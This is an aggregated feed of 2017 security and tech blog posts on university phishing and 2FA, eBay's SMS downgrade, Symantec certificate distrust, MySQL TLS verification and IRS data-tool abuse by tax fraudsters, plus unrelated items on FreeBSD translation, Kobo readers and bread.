Planet

Phishing 101 at the School of Hard Knocks

Postby BrianKrebs via Krebs on Security »

A recent, massive spike in sophisticated and successful phishing attacks is prompting many universities to speed up timetables for deploying mandatory two-factor authentication (2FA) — requiring a one-time code in addition to a password — for access to student and faculty services online. This is the story of one university that accelerated plans to require 2FA after witnessing nearly twice as many phishing victims in the first two and a half months of this year as it saw in all of 2015.

Bowling Green State University in Ohio has more than 20,000 students and faculty, and like virtually any other mid-sized state school its Internet users are constantly under attack from scammers trying to phish login credentials for email and online services.

BGSU had planned later this summer to make 2FA mandatory for access to the school’s portal — the primary place where students register for classes, pay bills, and otherwise manage their financial relationship to the university.

That is, until a surge in successful phishing attacks resulted in several students having bank accounts and W-2 tax forms siphoned.

On March 1, 2017 all BGSU account holders were required to change their passwords, and on March 15, 2017 two-factor authentication (Duo) protection was placed in front of the MyBGSU portal [full disclosure: Duo is a longtime advertiser on KrebsOnSecurity].

Matt Haschak, director of IT security and infrastructure at BGSU, said the number of compromised accounts detected at BGSU has risen from 250 in calendar year 2015 to 1000 in 2016, and to approximately 400 in the first 75 days of 2017.

Left unchecked, phishers are on track to steal credentials from nearly 10 percent of the BGSU student body by the end of this year. The university has offered 2FA options for its portal access since June 2016, but until this month few students or faculty were using it, Haschak said.
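
The projection behind that "nearly 10 percent" figure is simple arithmetic, assuming the rate of the first 75 days holds for the rest of the year:

```python
# 400 accounts compromised in the first 75 days of 2017, extrapolated to a full year
projected = 400 / 75 * 365
share = projected / 20000        # BGSU's roughly 20,000 students and faculty
print(round(projected), f"{share:.1%}")  # → 1947 9.7%
```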

“We saw very low adoption when it was voluntary,” he said. “And typically the people who adopted it were not my big security risks.”

Haschak said it’s clear that the scale and size of the phishing problem is hardly unique to BGSU.

“As I keep preaching to our campus community, this is not unique to BGSU,” Haschak said. “I’ve been talking a lot lately to my counterparts at universities in Ohio and elsewhere, and we’re all getting hit with these attacks very heavily right now. Some of the phishing scams are pretty good, but unfortunately some are god-awful, and I think people are just not thinking or they’re too busy in their day, they receive something on their phone and they just click it.”

Last month, an especially tricky phishing scam fooled several students who are also employed at the university into giving away their BGSU portal passwords, after which the thieves changed the victims’ direct deposit information so that their money went to accounts controlled by the phishers.

In other scams, the phishers would change the routing number for a bank account tied to a portal user, and then cancel that student’s classes near the beginning of a semester — thus kicking off a fraudulent refund.

One of the victims even had a fraudulent tax refund request filed in her name with the IRS as a result, Haschak said.

“They went in and looked at her W-2 information, which is also available via the portal,” he said.

While BGSU sends an email each time account information is changed, the thieves also have been phishing faculty and staff email accounts — which allows the crooks to delete the notification emails.

“The bad guys also went in and deleted the emails we sent, and then deleted the messages from the victim’s trash folder,” Haschak said.

Part of BGSU’s messaging to students and faculty about the new 2FA requirements for university portal access.
Ultimately, BGSU opted to roll out 2FA in a second stage for university email, mainly because of the logistics and support issues involved, but also because they wanted to focus on protecting the personally identifiable information in the BGSU portal as quickly as possible.

For now, BGSU is working on automating the opt-in for 2FA on university email. The 2FA system in front of its portal provides several 2FA options for students, including the Duo app, security tokens, or one-time codes sent via phone or SMS.

“If the numbers of compromised accounts keep increasing at the rate they are, we may get to that next level a lot sooner than our current roadmap for email access,” Haschak said.

2FA, also called multi-factor authentication or two-step verification, is a great way to dramatically improve the security of an online account — whether it’s at your bank, a file-sharing service, or your email. The idea is that even if thieves manage to snag your username and password — through phishing or via password-stealing malware — they still need access to that second factor to successfully impersonate you to the system.
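
That second factor is often a time-based one-time password (TOTP), the kind generated by apps like Duo or Google Authenticator. A minimal sketch of the standard RFC 6238 algorithm in Python (the secret, step, and digit count below are the common defaults, not anything specific to the services discussed here):

```python
import hashlib
import hmac
import struct
import time

def totp(secret: bytes, for_time=None, step: int = 30, digits: int = 6) -> str:
    """Compute an RFC 6238 time-based one-time password (SHA-1, the common default)."""
    now = time.time() if for_time is None else for_time
    counter = int(now // step)
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                       # dynamic truncation (RFC 4226)
    code = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: ASCII secret "12345678901234567890" at time 59 gives "287082"
print(totp(b"12345678901234567890", for_time=59))
```

Because the code is derived from a secret shared only between your device and the server, a phished password alone is not enough; the attacker would also need a valid, current code.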

Are you taking full advantage of 2FA options available to your various online accounts? Check out twofactorauth.org to find out where you might be able to harden your online account security.
Top

Daniel Suarez will do a Reddit AMA

Postby kris via The Isoblog. »

Daniel Suarez is planning a Reddit AMA on Monday, 24th of April. He’s in PST, and is asking for a preferred time on Twitter. Vote now.

Daniel Suarez Twitter AMA
Top

Number of road casualties in London

Postby kris via The Isoblog. »

The Guardian had in 2010 an article about road casualties in London:

There you will find that the fall of 299 brought the annual total down from 3,526 killed or seriously injured on London’s roads in 2008 to 3,227 in 2009.

That’s an eight percent fall, which is pretty significant statistically. However, in human terms, the fact that well over 3,000 people were killed or seriously injured in both 2008 and 2009 seems rather more significant. That’s nine or ten a day, including 204 people killed in 2008 and 184 in 2009.

We still consider such numbers a normal loss of life.
Top

Chrome considers Symantec CA rogue

Postby kris via The Isoblog. »

Ryan Sleevi writes:

Since January 19, the Google Chrome team has been investigating a series of failures by Symantec Corporation to properly validate certificates. Over the course of this investigation, the explanations provided by Symantec have revealed a continually increasing scope of misissuance with each set of questions from members of the Google Chrome team; an initial set of reportedly 127 certificates has expanded to include at least 30,000 certificates, issued over a period spanning several years. […]

To balance the compatibility risks versus the security risks, we propose a gradual distrust of all existing Symantec-issued certificates, requiring that they be replaced over time with new, fully revalidated certificates, compliant with the current Baseline Requirements. […]

Given the nature of these issues, and the multiple failures of Symantec to ensure that the level of assurance provided by their certificates meets the requirements of the Baseline Requirements or Extended Validation Guidelines, we no longer have the confidence necessary in order to grant Symantec-issued certificates the “Extended Validation” status.

Top

Google Latitude is back, and there is no migration method

Postby kris via The Isoblog. »

Google Maps reintroduces their Latitude feature, in which you can share your current position with others in real time (compare with 2009).



According to the video, you can share your position for a limited time and, thankfully, permanently too. According to all documentation, there are no contact groups, so you have to add individuals one by one instead of using Contact Groups or Google Plus circles.

And to make everything more painful, there is no migration of location-sharing-enabled Google Plus groups (the non-functional Latitude successor) to this feature, because “Fuck you!”.

I have no idea if this is mobile only or will also be visible with a proper UI on their Google Maps web interface.
Top

Electric car confusion

Postby kris via The Isoblog. »

Autoblog runs the headline “The race for autonomous cars is over. Silicon Valley lost.” The point they want to make is:

To paraphrase Elon Musk, Silicon Valley is learning that “Making rockets is hard, but making cars is really hard.” People outside of the auto industry tend to have a shallow understanding of how complex the business really is. They think all you have to do is design a car and start making it. But most startups never make it past the concept car stage because the move to mass production proves too daunting.

and

Yet, while companies like Google and Apple are giving up on making cars, they’re not giving up on the auto industry. There is another area where Silicon Valley could play a dominant role and it’s all about accessing car-based data.

It’s about the margins – making a thing gives you around 10% markup, making things out of data gives you much, much higher margins. This also frames the current discussions about privacy within the German government, and who is to own your data (hint: not you), especially when you drive.



But making software systems is also really, really hard. And an electric, self-driving car is first a system, then a piece of software, and only then a piece of hardware. And Forbes sees the automotive industry not really in a strong position here, focusing on GM and Tesla.

In reality, I don’t see GM making a meaningful strategic pivot to electric, especially compared to Tesla. Why?

By March 2017, GM sold a little over 2,000 Bolts, which retail around $37,000. By way of comparison, Tesla has delivered “over 183,000 Model S and X vehicles over the last four years,” according to Electrek. And then there’s the Model 3. Tesla has received over 400,000 customer deposits for its Model 3, which is priced at $35,000.

To some, what GM does with the Ampera-e looks like a compliance stunt to get fleet consumption down, not like a credible move to electric: greenwashing?

Read the whole thread
So what to make of it?

Making cars is hard. Making self-driving, electric cars is even harder, because it involves the hard tasks from making large physical machines and the hard tasks from making distributed, secure software systems.

Traditional car makers are not delivering (GM is singled out above, but the others are guilty, too), and they are not pivoting aggressively and fast enough into software and into electric. Silicon Valley, on the other hand, has largely pulled out of making large physical objects and focuses on the data generated by drivers.

Only Tesla seems to move at speed.
Top

Sweden may drop building permit requirements for PV

Postby kris via The Isoblog. »

PV Magazine notes that Sweden may drop building permit requirements for photovoltaic installations:

Sweden may launch probe into building permits for PV

Top

eBay Asks Users to Downgrade Security

Postby BrianKrebs via Krebs on Security »

Last week, KrebsOnSecurity received an email from eBay. The company wanted me to switch from using a hardware key fob when logging into eBay to receiving a one-time code sent via text message. I found it remarkable that eBay, which at one time was well ahead of most e-commerce companies in providing more robust online authentication options, is now essentially trying to downgrade my login experience to a less-secure option.

In early 2007, PayPal (then part of the same company as eBay) began offering its hardware token for a one-time $5 fee, and at the time the company was among very few that were pushing this second-factor (something you have) in addition to passwords for user authentication. In fact, I wrote about this development back when I was a reporter at The Washington Post:

“Armed with one of these keys, if you were to log on to your account from an unfamiliar computer and some invisible password stealing program were resident on the machine, the bad guys would still be required to know the numbers displayed on your token, which of course changes every 30 seconds. Likewise, if someone were to guess or otherwise finagle your PayPal password.”

The PayPal security key.
I’ve still got the same hardware token I ordered when writing about that offering, and it’s been working well for the past decade. Now, eBay is asking me to switch from the key fob to text messages, the latter being a form of authentication that security experts say is less secure than other forms of two-factor authentication (2FA).

The move by eBay comes just months after the National Institute of Standards and Technology (NIST) released a draft of new authentication guidelines that appear to be phasing out the use of SMS-based two-factor authentication. NIST said one-time codes that are texted to users over a mobile phone are vulnerable to interception, noting that thieves can divert the target’s SMS messages and calls to another device (either by social-engineering a customer service person at the phone company, or via more advanced attacks like SS7 hacks).

I asked eBay to explain their rationale for suggesting this switch. I received a response suggesting the change was more about bringing authentication in-house (the security key is made by Verisign) and that eBay hopes to offer additional multi-factor authentication options in the future.

“As a company, eBay is committed to providing a safe and secure marketplace for our millions of customers around the world,” eBay spokesman Ryan Moore wrote. “Our product team is constantly working on establishing new short-term and long-term, eBay-owned factors to address our customer’s security needs. To that end, we’ve launched SMS-based 2FA as a convenient 2FA option for eBay customers who already had hardware tokens issued through PayPal. eBay continues to work on advancing multi-factor authentication options for our users, with the end goal of making every solution more secure and more convenient. We look forward to sharing more as additional solutions are ready to launch.”

I think I’ll keep my key fob and continue using that for two-factor authentication on both PayPal and eBay, thank you very much. It’s not clear whether eBay is also phasing out the use of Symantec’s VIP Security Key App, which has long offered eBay and PayPal users alike more security than a texted one-time code. eBay did not respond to specific questions regarding this change.

Although SMS is not as secure as other forms of 2FA, it is probably better than nothing. Are you taking advantage of two-factor authentication wherever it is offered? The site twofactorauth.org maintains a fairly comprehensive list of companies that offer two-step or two-factor authentication.
Top

FreeBSD Dutch Documentation Project

Postby Remko Lodder via Evilcoder.org ❄️ »

So. It had been a while since I had proper time to look into the Dutch translation efforts again.

History

Due to various reasons not discussed here, I was not able to see the translation through properly. Rene did a lot of work (thank you for that, Rene!).

The PO system

First of all, I am going to discuss the PO system a bit. It is the gettext way of doing translations: it chops texts into msgid’s (the original message strings), each of which is translated via a msgstr (the translated string). Identical lines get the same translation, which can be a good thing, unless the context differs between the lines, in which case you can get ‘Google Translate’-style results.
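
For illustration, a PO catalog pairs each msgid with its msgstr; the entry below is a made-up Dutch example, not taken from the actual FreeBSD catalogs:

```po
#: book.xml:42
msgid "The FreeBSD Handbook"
msgstr "Het FreeBSD-handboek"
```

When the English source string changes, gettext marks the entry ‘fuzzy’ and the whole msgstr must be reviewed again.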

Back to the story…

After getting time again to see this through, I noticed that we have started using the “PO” system, using gettext. Our handbook (for example) is now translated from one huge book.xml file, which is cut into msgid’s that are then given translated msgstr’s. For this I use the poedit application (the PRO version) so that I have counters and translation suggestions from the online Translation Memory (TM) that we all develop. I also contribute the FreeBSD translations back to the TM so that everyone can profit from it.

I am now first synchronising the Glossary, because it did not change much compared with the current online translation, and then working my way back through what had already been translated, filling in the missing bits and pieces in between. Mike (a co-worker at Snow) also did a tremendous job over the last year getting this into better shape; his work had not yet been merged back into the online variants because it was not complete. I can use that information, though, to generate a manual handbook variant of that version and use it to carry the current translation effort further into the gettext/PO system.

Biting the bullet

As one of the first translation teams to use this, I expect to hit some bumps in the road. For example, there are lines that do not need translation: mailing list names are the same in every language (perhaps the description changes, but not the ‘realnames’). The same goes for my entity (&a.remko), which does not change, nor does my PGP key. And if those things do change, they require changes across all translation efforts as well as the original English version. We are looking into a way to ‘ignore’ them in the PO system but include them when building, so that PGP keys and such are always up to date.

I also discussed this with Vaclav, the developer of poedit, and he mentioned that it does not matter much: when a line changes and you update the PO file, those lines are invalidated and the entire string needs ‘retranslation’. That gets us into interesting situations we have not encountered before. I am biting the bullet myself, after we discussed this a few years ago, and I hope that the entire project can benefit from it.

Alternative options: pre-translate, or merge current translations automatically?

And yes, a valid question would be: can’t you merge the currently translated information into the PO system automatically? If every word were in the exact same spot and line, yes, that might be an option. Sadly, because of grammar and different wording (longer/shorter), the texts diverge from line 1 already, so it is not easily done. If you have suggestions, however, we are always willing to listen. Please join us on ‘translators@FreeBSD.org’ so that we can discuss these things better :-).
Top

Kobo readers using the internet

Postby Remko Lodder via Evilcoder.org ❄️ »

So I have this situation where I couldn’t get my Kobo reader to connect to the internet to fetch updates and/or use Kobo+, for example.

I started debugging with Ubiquiti ages ago to see where the problem lies. In the meantime I was unable to continue with this, but I had an interesting thought yesterday. I sniffed the traffic from the hardware (MAC) address of the ereader and noticed that it tried to resolve www.msftncsi.com and fetch /ncsi.txt. That site is Microsoft’s Network Connectivity Status Indicator (NCSI), which tells Microsoft systems whether an active internet connection is available.

Somehow Kobo seems to be using that for its Android-based readers as well. Without it, the network connection just disconnects and does nothing. That is somewhat upsetting, because the device is perfectly able to connect to the network(s) and has relatively free internet access. One thing to note is that I filter DNS responses and exclude known malware/spam hosts and analytics sites like Google, which reduces the amount of ads and bogus trackers. It seems that msftncsi.com is also on that list and thus gets an NXDOMAIN when queried.

I do not entirely understand why an ereader would need this kind of information before being able to connect to the internet. The device should associate with a WiFi access point and get an address and the like. Whether that gives continued access to the internet is a next step. So instead of giving up, it could just mark the WiFi symbol with an exclamation mark (!) to signal that something might not work, and/or just try to connect to the Kobo internet environment. That would be a more common use of the internet than depending on a file on the internet which might be blocked (as in my case).

For now I changed my caching MikroTiks to include msftncsi.com as a static entry pointing at my own webserver, which serves the file instead. That makes sure the Kobo can connect to the environment, and it gives me full control over that file instead of relying on some remote site that might do nasty things (without me knowing).
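
Serving that file yourself is trivial. A minimal Python sketch of such a stand-in (the payload is the exact text the real www.msftncsi.com/ncsi.txt returns; the port and hostnames are your own choice):

```python
import http.server

NCSI_BODY = b"Microsoft NCSI"  # exact payload served by the real www.msftncsi.com/ncsi.txt

class NcsiHandler(http.server.BaseHTTPRequestHandler):
    """Minimal stand-in for msftncsi.com: answer /ncsi.txt so connectivity checks succeed."""

    def do_GET(self):
        if self.path == "/ncsi.txt":
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(NCSI_BODY)))
            self.end_headers()
            self.wfile.write(NCSI_BODY)
        else:
            self.send_error(404)

    def log_message(self, *args):  # keep the console quiet
        pass

# To serve for real: http.server.HTTPServer(("", 80), NcsiHandler).serve_forever()
```

With the DNS entry pointed at a host running something like this, the connectivity check stays entirely under your control.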

Of course I asked Kobo (nicely and politely) to change this interesting behaviour.
Top

Tractor hacking and the right to repair

Postby kris via The Isoblog. »

Vice Motherboard has an article about US farmers hacking their John Deere tractors, because the software in the machinery comes with very limiting conditions.

To avoid the draconian locks that John Deere puts on the tractors they buy, farmers throughout America’s heartland have started hacking their equipment with firmware that’s cracked in Eastern Europe and traded on invite-only, paid online forums.[…]

“If things could get better, [companies like John Deere] should be forced to freely distribute the same software dealers have,” they said. “And stop locking down [Engine Control Module] reading functionality. They do this to force you to use their services, which they have a 100 percent monopoly on.”[…]

“What happens in 20 years when there’s a new tractor out and John Deere doesn’t want to fix these anymore?” the farmer using Ukrainian software told me. “Are we supposed to throw the tractor in the garbage, or what?”

 

Top


10 reasons not to do HTTPS interception

Postby kris via The Isoblog. »

Marnix Dekker has an article on HTTPS interception as it is being done in some workplaces.

He lists:

  • Are you serious? We worked so hard to make the web more secure and you are fucking it up.
  • HSTS, you are breaking it.
  • Blinds the browser and the user, because you re-encrypt with wildcard certs.
  • Disrupts personal use.
  • Breaks pinning and CT.
  • Breaks with consumerization.
  • Disrupts BYOD.
  • Discourages good user practices.
  • Limited benefits.
  • and finally: Hard shell, soft inside is not going to work.
Top



Network attacks on MySQL, Part 3: What do you trust?

Postby Daniël van Eeden via Daniël's Database Blog »

In my previous blogs I told you to enable SSL/TLS and force the connection to be secured. So I followed my own advice and forced SSL. Great!

So now everything is 100% secure isn't it?

No it isn't and I would never claim anything to be 100% secure.

There are important differences between the SSL/TLS implementations of browsers and the implementation in MySQL. One of these differences is that your browser has a trust store with a large set of trusted certificate authorities. If the website you visit has SSL enabled, then your browser will check whether the certificate it presents is signed by a trusted CA. MySQL doesn't use a list of trusted CA's, and this makes sense for many setups.

The key difference is that a website has clients (browsers) which are not managed by the same organization, while for MySQL connections the set of clients is often much smaller and more or less managed by one organization. Adding a CA for a set of MySQL connections is ok; adding a CA for groups of websites is not.

The result is that a self-signed certificate, or a certificate signed by an internal CA, is ok. A public CA also won't issue a certificate for internal hostnames, so if your server has an internal hostname this isn't even an option. Note that the organizations running public CA's sometimes offer a service where they manage your internal CA, but then your CA is not signed by the public CA.

But if you don't tell your MySQL client or application which CA's it should trust, it will trust all certificates. This allows an attacker to use a man-in-the-middle proxy which terminates the SSL connection between your client and the proxy and sets up another connection to the server, which may or may not be using SSL.

To protect against this attack:

  1. Use the --ssl-ca option for the client to specify the CA certificate.
  2. Use the --ssl-mode=VERIFY_CA option for the client.
You could use a separate CA for each server, or one CA for all MySQL servers in your organization. If you use multiple CA's, you should bundle them in one file or use --ssl-capath instead.
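
In option-file form, the two settings above look like this in the client section (the paths are examples for your own CA bundle; --ssl-mode requires MySQL 5.7.11 or later):

```ini
# ~/.my.cnf
[client]
ssl-ca   = /etc/mysql/certs/ca.pem   # CA certificate(s) the client will trust
ssl-mode = VERIFY_CA                 # reject servers whose cert is not signed by that CA
```

If you also want the server's hostname checked against its certificate, VERIFY_IDENTITY is the stricter option.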
Top

Student Aid Tool Held Key for Tax Fraudsters

Postby BrianKrebs via Krebs on Security »

Citing concerns over criminal activity and fraud, the U.S. Internal Revenue Service (IRS) has disabled an automated tool on its Web site that was used to help students and their families apply for federal financial aid. The removal of the tool has created unexpected hurdles for many families hoping to qualify for financial aid, but the action also eliminated a key source of data that fraudsters could use to conduct tax refund fraud.

Last week, the IRS and the Department of Education said in a joint statement that they were temporarily shutting down the IRS’s Data Retrieval Tool. The service was designed to make it easier to complete the Education Department’s Free Application for Federal Student Aid (FAFSA) — a lengthy form that serves as the starting point for students seeking federal financial assistance to pay for college or career school.

The U.S. Department of Education’s FAFSA federal student aid portal. A notice about the closure of the IRS’s data retrieval tool can be seen in red at the bottom right of this image.
In response to requests for comment, the IRS shared the following statement: “As part of a wider, ongoing effort at the IRS to protect the security of data, the IRS decided to temporarily suspend their Data Retrieval Tool (DRT) as a precautionary step following concerns that information from the tool could potentially be misused by identity thieves.”

“The scope of the issue is being explored, and the IRS and FSA are jointly investigating the issue,” the statement continued. “At this point, we believe the issue is relatively isolated, and no additional action is needed by taxpayers or people using these applications. The IRS and FSA are actively working on a way to further strengthen the security of information provided by the DRT. We will provide additional information when we have a specific timeframe for returning the DRT or other details to share.”

The removal of the IRS’s tool received relatively broad media coverage last week. For example, a story in The Wall Street Journal notes that the Treasury Inspector General for Tax Administration — which provides independent oversight of the IRS — “opened a criminal investigation into the potentially fraudulent use of the tool.”

Nevertheless, I could not find a single publication that sought to explain precisely what information identity thieves were seeking from this now-defunct online resource. Two sources familiar with the matter but who asked to remain anonymous because they were not authorized to speak on the record told KrebsOnSecurity that identity thieves were using the IRS’s tool to look up the “adjusted gross income” (AGI), which is an individual or family’s total gross income minus specific deductions.

Anyone completing a FAFSA application will need to enter the AGI as reported on the previous year’s income tax return of their parents or guardians. The AGI is listed on the IRS-1040 forms that taxpayers must file with the IRS each year. The IRS’s online tool was intended as a resource for students who needed to look up the AGI but didn’t have access to their parents’ tax returns.

Eligible FAFSA applicants could use the IRS’s data retrieval tool to populate relevant fields in the application with data pulled directly from the IRS. Countless college Web sites explain how the tool works in more detail; here’s one example (PDF).

As it happens, the AGI is also required to sign and validate electronic tax returns filed with the IRS. Consequently, the IRS’s data retrieval tool would be a terrific resource to help identity thieves successfully file fraudulent tax refund requests with the agency.

A notice from the IRS states that the adjusted gross income (AGI) is needed to validate electronically-filed tax returns.
Tax-related identity theft occurs when someone uses a Social Security number (SSN) — either a client’s, a spouse’s, or dependent’s — to file a tax return claiming a fraudulent refund. Thieves may also use a stolen Employer Identification Number (EIN) from a business client to create false Forms W-2 to support refund fraud schemes. Increasingly, fraudsters are simply phishing W-2 data in large quantities from human resource professionals at a variety of organizations. However, taxpayer AGI information is not listed on W-2 forms.

Victims usually first learn of the crime after having their returns rejected because scammers beat them to it. Even those who are not required to file a return can be victims of refund fraud, as can those who are not actually due a refund from the IRS.

This would not be the first time tax refund fraudsters abused an online tool made available by the IRS. During the height of tax-filing season in 2015, identity thieves used the irs.gov’s “Get Transcript” feature to glean salary and personal information they didn’t already have on targeted taxpayers. In May 2015, the IRS suspended the Get Transcript feature, citing its abuse by fraudsters and noting that some 100,000 taxpayers may have been victimized as a result.

In August 2015, the agency revised those estimates up to 330,000, but in February 2016, the IRS again more than doubled its estimate, saying the number of taxpayers targeted via abuse of the Get Transcript tool was probably closer to 724,000.

The IRS re-enabled its Get Transcript service last summer, saying it had fortified the system with additional security safeguards — such as requiring visitors to supply a mobile phone number that is tied to the applicant’s name.

Now, the IRS is touting its new and improved Get Transcript service as an alternative method for obtaining the information needed to complete the FAFSA.

“If you did not retain a copy of your tax return, you may be able to access the tax software you used to prepare your return or contact your tax preparer to obtain a copy,” the IRS said in its advisory on the shutdown of its data retrieval tool. “You must verify your identity to use this tool. You also may use Get Transcript by Mail or call 1-800-908-9946, and a transcript will be delivered to your address of record within five to 10 days.”

The IRS advises those who still need help completing the FAFSA to visit StudentAid.gov/fafsa or call 1-800-4FED-AID (1-800-433-3243).

DON’T BE THE NEXT VICTIM

Here are some steps you can take to make it less likely that you will be the next victim of tax refund fraud:

-File before the fraudsters do it for you – Your primary defense against becoming the next victim is to file your taxes at the state and federal level as quickly as possible. Remember, it doesn’t matter whether or not the IRS owes you money: Thieves can still try to impersonate you and claim that they do, leaving you to sort out the mess with the IRS later.

-Get on a schedule to request a free copy of your credit report. By law, consumers are entitled to a free copy of their report from each of the major bureaus once a year. Put it on your calendar to request a copy of your file every three to four months, each time from a different credit bureau. Dispute any unauthorized or suspicious activity. This is where credit monitoring services are useful: Part of their service is to help you sort this out with the credit bureaus, so if you’re signed up for credit monitoring make them do the hard work for you.

-File form 14039 and request an IP PIN from the government. This form requires consumers to state they believe they’re likely to be victims of identity fraud. Even if thieves haven’t tried to file your taxes for you yet, virtually all Americans have been touched by incidents that could lead to ID theft — even if we just look at breaches announced in the past year alone.

-Consider placing a “security freeze” on your credit files with the major credit bureaus. See this tutorial about why a security freeze — also known as a “credit freeze” — may be more effective than credit monitoring in blocking ID thieves from assuming your identity to open up new lines of credit. While it’s true that having a security freeze on your credit file won’t stop thieves from committing tax refund fraud in your name, it would stop them from fraudulently obtaining your IP PIN.

-Monitor, then freeze. Take advantage of any free credit monitoring available to you, and then freeze your credit file with the four major bureaus. Instructions for doing that are here.
Top

WireGuard in Google Summer of Code

Postby via Nerdling Sapple »

WireGuard is participating in Google Summer of Code 2017. If you're a student who would like to be funded this summer for writing interesting kernel code, studying cryptography, building networks, or working on a wide variety of interesting problems, then this might be appealing. The program opened to students on March 20th. If you're applying for WireGuard, choose "Linux Foundation" and state in your proposal that you'd like to work on WireGuard with "Jason Donenfeld" as your mentor.
Top

Sensitive Issues, according to YouTube

Postby kris via The Isoblog. »

Clearly, some things are more sensitive than others for YouTube.

Brianna Wu

This is in response to YouTube Creators saying:

We are so proud to represent LGBTQ+ voices on our platform — they’re a key part of what YouTube is all about. The intention of Restricted Mode is to filter out mature content for the tiny subset of users who want a more limited experience. LGBTQ+ videos are available in Restricted Mode, but videos that discuss more sensitive issues may not be. We regret any confusion this has caused and are looking into your concerns. We appreciate your feedback and passion for making YouTube such an inclusive, diverse, and vibrant community.

Youtube Creators
(This needs to be read in the context of YouTube being a platform for the American Nazi Movement, their GamerGate subwing and the like.)

(This also needs to be read in the context of YouTube playing out brand ads in racist or misogynistic videos, which has led to advertisers boycotting YouTube. That boycott has hit them, so they were forced to react.)
Top

Tumblr of the Day: #gopdnd

Postby kris via The Isoblog. »

If you haven’t done so yet, check out #gopdnd on Twitter.

Top

Malvertising – we have only seen the beginning

Postby kris via The Isoblog. »

Netzpolitik.org has an article (in German) in which they are interviewing IT-Security Consultant Thorsten Schröder on Adblockers, wasted capped mobile bandwidth and Malvertising.

netzpolitik.org: Neben dem Schutz vor Malware, welche weiteren Gründe für die Nutzung von Adblockern findest Du wichtig?

Thorsten Schröder: Wenn wir als Malware all das klassifizieren, was Nutzer ausspioniert, täuscht, kompromittiert oder finanziell schädigt, haben wir im Grunde schon mal eine ganze Reihe an Gründen abgehakt. Nutzer müssen die Möglichkeit haben, selbstbestimmt das Schutzniveau ihres Computers bestimmen zu dürfen. Hat die Bundesregierung vielleicht mal das Bundesamt für Sicherheit in der Informationstechnik (BSI) gefragt? Es wäre eine gute Gelegenheit für das BSI, zu zeigen, was es drauf hat.

»netzpolitik.org: Besides the protection against malware, what other reasons for using Adblockers are important to you?

Thorsten Schröder: If we classify as malware everything that spies on users, deceives them, compromises them or harms them financially, we have basically already ticked off a whole range of reasons. Users must be able to decide for themselves the level of protection of their computers. Did the federal government perhaps ever ask the Bundesamt für Sicherheit in der Informationstechnik (BSI)? It would be a good opportunity for the BSI to show what it can do.«



The article goes on to discuss numbers and percentages. That is actually not helpful.

The numbers stated are, by construction, too low, and that cannot be helped. Also, the numbers are ultimately irrelevant, because Malvertisements are not distributed randomly and evenly.

The point being that Ad-Networks generate their value not only from the raw number of eyeballs reached, but quite a lot comes from being able to reach the right kind of eyeballs. The better the Ad-Network, the better their targeting.

10,000 drive-by impressions are worth quite a lot more when I can make sure that all 10,000 of them hit exploitable XP/MSIE 6 combos, even if the relative number of installations left in the world with these characteristics is quite low.

And 10,000 impressions for ads containing this or that scam are worth a lot more when I can select an audience for these 10,000 impressions that is badly educated, old, or otherwise struggling to stay on top of this Internet thing, and thus more likely to fall for it.

Targeted advertising and Malware Distribution are a match made in hell; they amplify each other synergistically.

This is an effect we need to push more to the front of this discussion. Content Sites are responsible for the ads integrated into their content and shown “as their own”. Ad Networks are responsible for the way the selectors they offer are being used. The German construct of Störerhaftung works in all directions, not just against private Wifi offerings.
Top

We have bread again!

Postby kris via The Isoblog. »

Like every German living abroad, I suffer from the bread question. But things are clearing up: the most wonderful wife of all has her sourdough going again, and this is a fabulous batch of tiny sourdough Ciabatta.

Top

Making Adblock illegal in Germany?

Postby kris via The Isoblog. »

If you can read German, check out Torsten Kleinz’s posting on Google Plus. He was in the Ausschuß für Kultur und Medien of the Parliament of Nordrhein-Westfalen, explaining ad auctions and ad blockers to members of the parliament.

The protocol (PDF, German language) is available here. It’s a long read, but worth your time.
Top

Breaking the law in traffic…

Postby kris via The Isoblog. »

JTLU Paper
The Journal of Transport and Land Use has a rather lengthy article on people breaking traffic laws. TL;DR: Everybody in traffic is breaking the law, but for different reasons.



The JTLU paper finds:

When including driving and pedestrian scenario responses—such as how often respondents drive over the speed limit or jaywalk—100% of our sample population admitted to some form of law-breaking in the transportation system (i.e., everybody is technically a criminal).

When disaggregating by mode, 95.87% of bicyclists, 97.90% of pedestrians, and nearly all drivers (99.97%) selected responses that would be considered illegal. The rationale for why these road users were breaking the law, however, differed by mode. Drivers and pedestrians that break the rules of the road tended to do so to save time (77% and 85% of drivers and pedestrians, respectively). However, bicyclists report disregarding the rules of road for other reasons.

The most prevalent response as to why bicyclists break the rules was “personal safety” with more than 71% of respondents citing that as a reason. Saving energy came in second for bicyclists (56%) followed by saving time (50%). Increasing one’s visibility was the fourth most cited response (47%) for bicyclists breaking the law.

While the overwhelming majority of bicyclists break the rules, the open response answers suggest that most do so in situations where little harm would come to themselves or others and are often motivated by concerns for their own safety because they feel like an afterthought in a car-dominated transportation system.

That ties in nicely with the findings in We learned a few things about Cycle Path design in the last 25 years elsewhere in this blog.
Top

Bacteria talk…

Postby kris via The Isoblog. »

Disrupting Bacterial Chatter
Bonnie Bassler, a molecular biologist at Princeton University, discovered that bacteria can communicate, across species borders, using signal molecules. Synchronisation between individuals in a biofilm, Quorum Sensing, can launch attacks that overwhelm an immune system.


It’s an important mechanism for bacteria, so it even has a genetic backup: multiple redundant communication channels. And at least one of them works across species barriers. She says in Discover:

What they first do is they scan the environment. And they’re asking the simplest question: “Am I alone or am I in a group?” They just look for any quorum-sensing molecule. Then, the more sophisticated question that I think they ask is, “Who is that?”

They can say, “You are my absolute identical twin.” They can say, “You’re my extended family.” And then they say, “You’re some other species.” They’re not just counting. There’s information encoded in these molecules that tells a bacterium who that neighbor is — how related they are. And depending on the ratio of those three molecules, they understand whether their family is winning or losing.

Sabotaging Quorum Sensing in biofilms can help fight dangerous infections by disabling the communication and sensing methods of the bacteria.
Top

Restoring Neuroplasticity

Postby kris via The Isoblog. »

Children learn much faster than you do. That’s because as you grow up, the brain turns down Neuroplasticity to protect what you have already learned from newer, potentially harmful influences. It used to make sense.

Now, how about some drugs that turn your brain’s ability to learn new tricks fast back on, on demand? The New Scientist knows:

Until the age of 7 or so, the brain goes through several “critical periods” during which it can be radically changed by the environment. During these times, the brain is said to have increased plasticity. […]

